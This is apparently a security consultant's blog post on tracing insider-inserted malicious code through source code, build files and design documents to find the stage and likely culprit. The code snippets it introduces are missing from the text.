Let’s imagine you discover a string of suspicious code within one of your applications. Perhaps a routine scan by your application testing team finds a point of interest that indicates malcode, such as a time bomb or backdoor, has been inserted by a malicious insider within your software supply chain.
First, you breathe a huge sigh of relief that you found the problem before it caused any lasting damage (data theft, log keystrokes, money siphoning or otherwise subvert functions of the application).
But, then you think: if a malicious insider inserted malcode into one application, what’s to stop them from targeting another?
You need to unmask the culprit.
Malicious code can be injected into an executable as late as the final production build, which means your adversary could be anyone within your software supply chain.
Your suspect list includes people with the necessary access and/or ability to insert malcode.
Analysis of the executable alone will not provide enough information to narrow down the list of potential suspects. For that type of detection work, you need to get your hands on source code, build files and design documents. In combination, these assets can help you put together a timeline for when the malicious code was inserted. Here’s how it works.
If you find malicious code in both the executable and the source code of an application, you’ve got a strong indicator that your culprit is a member of the development team.
If the malicious code is not present in the source code, it could mean that the malicious code was removed from the source code before the code was analyzed or that the code was injected at a later stage in the SDLC.
In order to narrow down the search, we need to take into account the location from which code was obtained. If code was obtained from a repository where any code changes are tracked and from which code is retrieved for the build process, it is a strong indicator that the malicious finding was injected at a later stage in the SDLC.
Since malicious code can also be injected in an application at a stage after development, you also need to analyze build files.
For example, build files can be made to execute programs that inject malicious code at build time by addition of a simple task, as shown in the following ant build file snippet:
Build files can also be configured to retrieve malicious dependencies from locations outside the build servers, as shown in the following snippets:
An insider can also replace existing dependencies in the build server’s local repository with malicious ones. During the build process, these malicious dependencies will be used even by a benign build file and will result in malicious code being injected into every application using those dependencies. The presence of malicious code in an executable where the source code and build file both appear benign points toward this case.
Design documents are helpful in determining whether code that looks malicious is actually malicious or not. For example, consider the snippet below from a web.xml. The code shows an application that has an alternate servlet with an alternate path mapping. A design document would show if this alternate path is required by design or if it is potentially malicious.
The more information you have, the easier it will be to find the source of any insider threat. Once you believe you know the stage at which malcode was inserted, you may have enough information to track back actions to a specific individual, or you may need to monitor the team more closely. Keep the investigation team small so you don’t raise any flags before your suspicions are confirmed.
About the Author
Rishabh Gupta is a Security Consultant at Synopsys. He specializes in static analysis and network security.